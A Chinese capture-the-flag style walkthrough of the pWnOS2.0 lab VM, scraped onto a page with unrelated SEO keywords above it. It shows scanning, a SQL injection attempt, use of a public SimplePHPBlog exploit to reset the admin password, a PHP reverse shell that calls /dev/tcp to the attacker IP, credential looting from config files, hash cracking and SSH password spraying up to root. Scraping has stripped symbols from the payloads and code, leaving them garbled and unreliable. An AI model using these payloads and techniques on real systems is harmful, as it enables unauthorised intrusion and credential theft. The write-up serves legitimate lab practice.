当前位置：首页 > news >正文

建设工程平台网站外贸选品网站

news 2026/4/19 21:20:53

建设工程平台网站,外贸选品网站,西宁网站制作多少钱,wordpress版本信息在哪里查看pWnOS2.0 靶机渗透( ) 靶机介绍 vulnhub 靶机本地搭建由于靶机特性#xff0c;靶机网卡位nat模式扫不到#xff0c;原来需要改 nat 的地址参考方法 https://blog.csdn.net/Bossfrank/article/details/131415257 作者主页 https://blog.csdn.net/Bossfrank?typeblog P…pWnOS2.0 靶机渗透( ) 靶机介绍 vulnhub 靶机本地搭建由于靶机特性靶机网卡位nat模式扫不到原来需要改 nat 的地址参考方法 https://blog.csdn.net/Bossfrank/article/details/131415257 作者主页 https://blog.csdn.net/Bossfrank?typeblog PS: 国科大硕士老哥很牛非常牛学习了 nmap 信息收集 ┌──(kali㉿kali)-[~] 20:37:33 [0/3] └─$ sudo nmap -sn 10.10.10.0/24 [sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:37 CST Nmap scan report for localhost (10.10.10.1) Host is up (0.00035s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for bogon (10.10.10.2) Host is up (0.00010s latency). MAC Address: 00:50:56:F3:32:0E (VMware) Nmap scan report for bogon (10.10.10.100) Host is up (0.00019s latency). MAC Address: 00:0C:29:8D:63:FF (VMware) Nmap scan report for localhost (10.10.10.128) Host is up (0.00012s latency). MAC Address: 00:0C:29:83:4F:85 (VMware) Nmap scan report for bogon (10.10.10.254) Host is up (0.000068s latency). MAC Address: 00:50:56:EB:94:F3 (VMware) Nmap scan report for localhost (10.10.10.129) Host is up. Nmap done: 256 IP addresses (6 hosts up) scanned in 1.92 seconds ┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 10000 -p- 10.10.10.100 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:39 CST Nmap scan report for bogon (10.10.10.100) Host is up (0.000045s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:8D:63:FF (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds ┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST Nmap scan report for bogon (10.10.10.100) Host is up (0.00037s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.17 ((Ubuntu)) MAC Address: 00:0C:29:8D:63:FF (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.32 - 2.6.39 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds ┌──(kali㉿kali)-[~] └─$ sudo nmap --scriptvuln -p22,80 10.10.10.100 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 91.09% done; ETC: 20:42 (0:00:08 remaining) Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 93.56% done; ETC: 20:44 (0:00:11 remaining) Nmap scan report for bogon (10.10.10.100) Host is up (0.00034s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldnt find any CSRF vulnerabilities. |_http-dombased-xss: Couldnt find any DOM based XSS. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http servers resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-stored-xss: Couldnt find any stored XSS vulnerabilities. |_http-phpself-xss: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:8D:63:FF (VMware) Nmap done: 1 IP address (1 host up) scanned in 395.77 seconds web 渗透 “欢迎来到这个网站如果你有任何问题请发邮件给 adminisints.com” 爆破目录 ┌──(kali㉿kali)-[~] └─$ sudo dirb http://10.10.10.100 [sudo] password for kali: ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Sep 29 23:08:26 2024 URL_BASE: http://10.10.10.100/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.100/ ---- http://10.10.10.100/activate (CODE:302|SIZE:0) DIRECTORY: http://10.10.10.100/blog/ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288) DIRECTORY: http://10.10.10.100/includes/ http://10.10.10.100/index (CODE:200|SIZE:854) http://10.10.10.100/index.php (CODE:200|SIZE:854) http://10.10.10.100/info (CODE:200|SIZE:50175) http://10.10.10.100/info.php (CODE:200|SIZE:50044) http://10.10.10.100/login (CODE:200|SIZE:1174) http://10.10.10.100/register (CODE:200|SIZE:1562) http://10.10.10.100/server-status (CODE:403|SIZE:293) ---- Entering directory: http://10.10.10.100/blog/ ---- http://10.10.10.100/blog/add (CODE:302|SIZE:0) http://10.10.10.100/blog/atom (CODE:200|SIZE:1062) http://10.10.10.100/blog/categories (CODE:302|SIZE:0) http://10.10.10.100/blog/comments (CODE:302|SIZE:0) DIRECTORY: http://10.10.10.100/blog/config/ http://10.10.10.100/blog/contact (CODE:200|SIZE:6001) DIRECTORY: http://10.10.10.100/blog/content/ http://10.10.10.100/blog/delete (CODE:302|SIZE:0) DIRECTORY: http://10.10.10.100/blog/docs/ DIRECTORY: http://10.10.10.100/blog/flash/ DIRECTORY: http://10.10.10.100/blog/images/ http://10.10.10.100/blog/index (CODE:200|SIZE:8094) http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094) http://10.10.10.100/blog/info (CODE:302|SIZE:0) http://10.10.10.100/blog/info.php (CODE:302|SIZE:0) DIRECTORY: http://10.10.10.100/blog/interface/ DIRECTORY: http://10.10.10.100/blog/languages/ http://10.10.10.100/blog/login (CODE:200|SIZE:5750) http://10.10.10.100/blog/logout (CODE:302|SIZE:0) http://10.10.10.100/blog/options (CODE:302|SIZE:0) http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411) http://10.10.10.100/blog/rss (CODE:200|SIZE:1237) DIRECTORY: http://10.10.10.100/blog/scripts/ http://10.10.10.100/blog/search (CODE:200|SIZE:5034) http://10.10.10.100/blog/setup (CODE:302|SIZE:0) http://10.10.10.100/blog/static (CODE:302|SIZE:0) http://10.10.10.100/blog/stats (CODE:200|SIZE:5392) DIRECTORY: http://10.10.10.100/blog/themes/ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0) http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.100/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/config/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/content/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/docs/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/flash/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/interface/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/languages/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/scripts/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://10.10.10.100/blog/themes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ----------------- END_TIME: Sun Sep 29 23:08:34 2024 DOWNLOADED: 9224 - FOUND: 30 注入一下 login.php 试一试 ’ or 11 – 或者 ’ or 11 # 搞笑爆源码了把爆出来的目录 grep 出 200 的页推测这是一个内容管理系统找找 cms 的名称在位置 view-source:http://10.10.10.100/blog/index.php 找到 Simple PHP Blog 0.4.0 漏洞库找一找 ┌──(kali㉿kali)-[~/testPwnos2.0] 20:49:59 [0/3] └─$ sudo searchsploit simple php blog 0.4.0 [sudo] password for kali: ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Simple PHP Blog 0.4 - colors.php Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26463.txt Simple PHP Blog 0.4 - preview_cgi.php Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26461.txt Simple PHP Blog 0.4 - preview_static_cgi.php Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26462.txt Simple PHP Blog 0.4.0 - Multiple Remote s | php/webapps/1191.pl Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results┌──(kali㉿kali)-[~/testPwnos2.0] └─$ searchsploit simple php blog -m 1191 [!] Could not find EDB-ID #[!] Could not find EDB-ID #[!] Could not find EDB-ID #Exploit: Simple PHP Blog 0.4.0 - Multiple Remote sURL: https://www.exploit-db.com/exploits/1191Path: /usr/share/exploitdb/exploits/php/webapps/1191.plCodes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192Verified: True File Type: Perl script text executable Copied to: /home/kali/testPwnos2.0/1191.pl┌──(kali㉿kali)-[~/testPwnos2.0] └─$ ls 1191.pl dir.ori sudo apt-get install libswitch-perl________________________________________________________________________________ SimplePHPBlog v0.4.0 Exploits by Kenneth F. Belva, CISSP http://www.ftusecurity.com ________________________________________________________________________________ Program : 1191.pl Version : v0.1 Date : 8/25/2005 Descript: This perl script demonstrates a few flaws in SimplePHPBlog. Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY... DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO NOT HAVE PERMISSION TO DO SO! Please see this script comments for solution/fixes to demonstrated vulnerabilities. http://www.simplephpblog.com Usage : 1191.pl [-h host] [-e exploit] -? : this menu -h : host -e : exploit (1) : Upload cmd.php in [site]/images/ (2) : Retreive Password file (hash) (3) : Set New User Name and Password [NOTE - uppercase switches for exploits] -U : user name -P : password (4) : Delete a System File -F : Path and System File Examples: 1191.pl -h 127.0.0.1 -e 2 1191.pl -h 127.0.0.1 -e 3 -U l33t -P l33t 1191.pl -h 127.0.0.1 -e 4 -F ./index.php 1191.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd 1191.pl -h 127.0.0.1 -e 1 ┌──(kali㉿kali)-[~/testPwnos2.0] └─$ sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hugomc -P hugomc ________________________________________________________________________________SimplePHPBlog v0.4.0 ExploitsbyKenneth F. Belva, CISSPhttp://www.ftusecurity.com ________________________________________________________________________________ Running Set New Username and Password Exploit....Deleted File: ./config/password.txt ./config/password.txt created! Username is set to: hugomc Password is set to: hugomc*** Exploit Completed.... Have a nice day! :) 传 shell 拿下初级 shell ┌──(kali㉿kali)-[~/testPwnos2.0] └─$ cat shell.php ?php exec(/bin/bash -c bash -i /dev/tcp/10.10.10.129/1234 01); ? 把这个 shell 传上去结合目录爆破推测 shell 位置应该在 http://10.10.10.100/blog/images/shell.php 监听访问即可得到 shell 拿到初始 shell ┌──(kali㉿kali)-[~/testPwnos2.0] [0/41] └─$ sudo ncat -lvnp 1234 [sudo] password for kali: Ncat: Version 7.94SVN ( https://nmap.org/ncat ) Ncat: Listening on [::]:1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.10.100:34941. bash: no job control in this shell www-dataweb:/var/www/blog/images$ 尝试提权 ┌──(kali㉿kali)-[~/testPwnos2.0] [0/41] └─$ sudo ncat -lvnp 1234 [sudo] password for kali: Ncat: Version 7.94SVN ( https://nmap.org/ncat ) Ncat: Listening on [::]:1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.10.100:34941. bash: no job control in this shell www-dataweb:/var/www/blog/images$ www-dataweb:/var/www/blog/images$ whoami whoami www-data www-dataweb:/var/www/blog/images$ ip a ip a 1: lo: LOOPBACK,UP,LOWER_UP mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: BROADCAST,MULTICAST,UP,LOWER_UP mtu 1500 qdisc pfifo_fast state UP qlen 1000link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ffinet 10.10.10.100/24 brd 10.10.10.255 scope global eth0inet6 fe80::20c:29ff:fe8d:63ff/64 scope link valid_lft forever preferred_lft forever www-dataweb:/var/www/blog/images$ sudo -l sudo -l sudo: no tty present and no askpass program specified www-dataweb:/var/www/blog/images$ uname -a uname -a Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux www-dataweb:/var/www/blog/images$ python --version python --version Python 2.7.1 www-dataweb:/var/www/blog/images$ 使用 python 升级交互性 www-dataweb:/var/www/blog/images$ python -c import pty;pty.spawn(/bin/bash) images$ python -c import pty;pty.spawn(/bin/bash) 找一找敏感文件泄露 www-dataweb:/var/www/blog/images$ pwd pwd /var/www/blog/images www-dataweb:/var/www/blog/images$ cd .. cd .. www-dataweb:/var/www/blog$ ls ls add.php flash rate_cgi.php add_block.php image_list.php rdf.php add_cgi.php images recompress.php add_link.php index.php rss.php add_static.php info.php scripts add_static_cgi.php install00.php search.php atom.php install01.php set_login.php categories.php install02.php set_login_cgi.php colors.php install03.php setup.php colors_cgi.php install03_cgi.php setup_cgi.php comment_add_cgi.php interface static.php comment_delete_cgi.php languages stats.php comments.php languages.php themes config languages_cgi.php themes.php contact.php login.php trackback.php contact_cgi.php login_cgi.php trackback_delete_cgi.php content logout.php upgrade.php delete.php options.php upload_img.php delete_static.php options_cgi.php upload_img_cgi.php docs preview_cgi.php upload_img_new.php downgrade.php preview_static_cgi.php www-dataweb:/var/www/blog$ cd .. cd .. www-dataweb:/var/www$ ls ls activate.php includes info.php mysqli_connect.php blog index.php login.php register.php 似乎找到了 www-dataweb:/var/www$ cat mysqli_connect.php cat mysqli_connect.php ?php # Script 8.2 - mysqli_connect.php// This file contains the database access information. // This file also establishes a connection to MySQL // and selects the database.// Set the database access information as constants:DEFINE (DB_USER, root); DEFINE (DB_PASSWORD, goodday); DEFINE (DB_HOST, localhost); DEFINE (DB_NAME, ch16);// Make the connection:$dbc mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die (Could not connect to MySQL: . mysqli_connect_error() );?www-dataweb:/var/www$ 没法登录还有其他的配置文件吗 www-dataweb:/var/www$ mysql -uroot -pgoodday mysql -uroot -pgoodday ERROR 1045 (28000): Access denied for user rootlocalhost (using password: YES)是的其他位置的数据库连接配置文件有不同的内容 www-dataweb:/var/www$ find / -name mysqli_connect.php 2/dev/null find / -name mysqli_connect.php 2/dev/null /var/mysqli_connect.php /var/www/mysqli_connect.php www-dataweb:/var/www$ cat /var/mysqli_connect.php cat /var/mysqli_connect.php ?php # Script 8.2 - mysqli_connect.php// This file contains the database access information. // This file also establishes a connection to MySQL // and selects the database.// Set the database access information as constants:DEFINE (DB_USER, root); DEFINE (DB_PASSWORD, rootISIntS); DEFINE (DB_HOST, localhost); DEFINE (DB_NAME, ch16);// Make the connection:$dbc mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die (Could not connect to MySQL: . mysqli_connect_error() );?www-dataweb:/var/www$ 成功登录mysql www-dataweb:/var/www$ mysql -uroot -prootISIntS mysql -uroot -prootISIntS Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 36 Server version: 5.1.54-1ubuntu4 (Ubuntu)Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved. This software comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to modify and redistribute it under the GPL v2 licenseType help; or \h for help. Type \c to clear the current input statement.mysql 看一看数据库的内容 mysql show databases; show databases; -------------------- | Database | -------------------- | information_schema | | ch16 | | mysql | -------------------- 3 rows in set (0.00 sec)mysql use ch16 use ch16 Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -ADatabase changed mysql show tables; show tables; ---------------- | Tables_in_ch16 | ---------------- | users | ---------------- 1 row in set (0.00 sec) 看一看用户表 mysql select * from users; select * from users; ------------------------------------------------------------------------------------------------------------------------------------- | user_id | first_name | last_name | email | pass | user_level | active | registration_date | ------------------------------------------------------------------------------------------------------------------------------------- | 1 | Dan | Privett | adminisints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | 0 | NULL | 2011-05-07 17:27:01 | ------------------------------------------------------------------------------------------------------------------------------------- 1 row in set (0.00 sec) 密码的加密方式识别位 sha-1 ┌──(kali㉿kali)-[~/testPwnos2.0] └─$ hash-identifier c2c4b4e51d9e23c02c15702c136c3e950ba9a4af ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ \ ## \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ ## \ \ _ \ /__\ / ,__\ \ \ _ \ \ \ \ \ \ \ \ \ ## \ \ \ \ \/\ \_\ \_/\__, \ \ \ \ \ \ \_\ \__ \ \ \_\ \ ## \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ ## \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 ## By Zion3R ## www.Blackploit.com ## RootBlackploit.com ########################################################################## -------------------------------------------------- Possible Hashs: [] SHA-1 [] MySQL5 - SHA-1(SHA-1($pass)) 拿到密码哈希尝试解密 sha-1 密码为 c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying看一看 passwd 确定用户名 www-dataweb:/var/www$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false mysql:x:0:0:MySQL Server,,,:/root:/bin/bash sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin landscape:x:104:110::/var/lib/landscape:/bin/false dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash密码碰撞尝试密码碰撞进ssh 可能的用户名 administrator admin dan root hugomc 可能的密码 killerbeesareflying rootISIntS hugomc使用 crackmapexec 找到账号密码 ┌──(kali㉿kali)-[~/testPwnos2.0] └─$ sudo crackmapexec ssh 10.10.10.100 -p passwords.lst -u users.lst --continue-on-success SSH 10.10.10.100 22 10.10.10.100 [*] SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3 SSH 10.10.10.100 22 10.10.10.100 [-] administrator:killerbeesareflying Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] administrator:rootISIntS Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] administrator:hugomc Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] admin:killerbeesareflying Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] admin:rootISIntS Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] admin:hugomc Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] dan:killerbeesareflying Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] dan:rootISIntS Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] dan:hugomc Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] root:killerbeesareflying Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [] root:rootISIntS (Pwn3d!) SSH 10.10.10.100 22 10.10.10.100 [-] root:hugomc Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] hugomc:killerbeesareflying Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] hugomc:rootISIntS Authentication failed. SSH 10.10.10.100 22 10.10.10.100 [-] hugomc:hugomc Authentication failed. 拿下 ┌──(kali㉿kali)-[~/testPwnos2.0] └─$ sudo ssh root10.10.10.100 The authenticity of host 10.10.10.100 (10.10.10.100) cant be established. ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3AMXSigXAGS4uldZp3grLm8w. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 10.10.10.100 (ECDSA) to the list of known hosts. root10.10.10.100s password: Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)* Documentation: http://www.ubuntu.com/server/docSystem information as of Fri Aug 9 18:44:09 EDT 2024System load: 0.0 Processes: 77Usage of /: 2.9% of 38.64GB Users logged in: 0Memory usage: 18% IP address for eth0: 10.10.10.100Swap usage: 0%Graph this data and manage this system at https://landscape.canonical.com/ Last login: Mon May 9 19:29:03 2011 rootweb:~# whoami root rootweb:~# ip a 1: lo: LOOPBACK,UP,LOWER_UP mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: BROADCAST,MULTICAST,UP,LOWER_UP mtu 1500 qdisc pfifo_fast state UP qlen 1000link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ffinet 10.10.10.100/24 brd 10.10.10.255 scope global eth0inet6 fe80::20c:29ff:fe8d:63ff/64 scope link valid_lft forever preferred_lft forever 看一看权限 rootweb:~# sudo -l Matching Defaults entries for root on this host:env_resetUser root may run the following commands on this host:(ALL : ALL) ALL 总结 nmap 扫描发现靶机开放了 22, 80 端口访问 80结合目录爆破发现 /blog 目录中运行了一个 cms 系统观察发现 cms 的名称和版本是 simple php blog 0.4.0 尝试在 searchsploit 中找利用脚本发现利用脚本使用脚本在 cms 中创建新账号并成功登录发现后台的上传图片验证可以上传 .php 文件后构造反弹 shell成功拿到 shell 拿到初始 shell 后做信息收集。发现两个数据库连接文件其中一个是目前 cms 正在使用的。尝试账号密码成功登录数据库发现数据库内有一个sha-1加密的密码可破解作密码碰撞成功使用 ssh 登录。原来是 cms 系统部署者的 Linux 系统 root 用户密码使用了 mysql 数据库 root 用户的密码

查看全文

http://www.hkea.cn/news/14332695/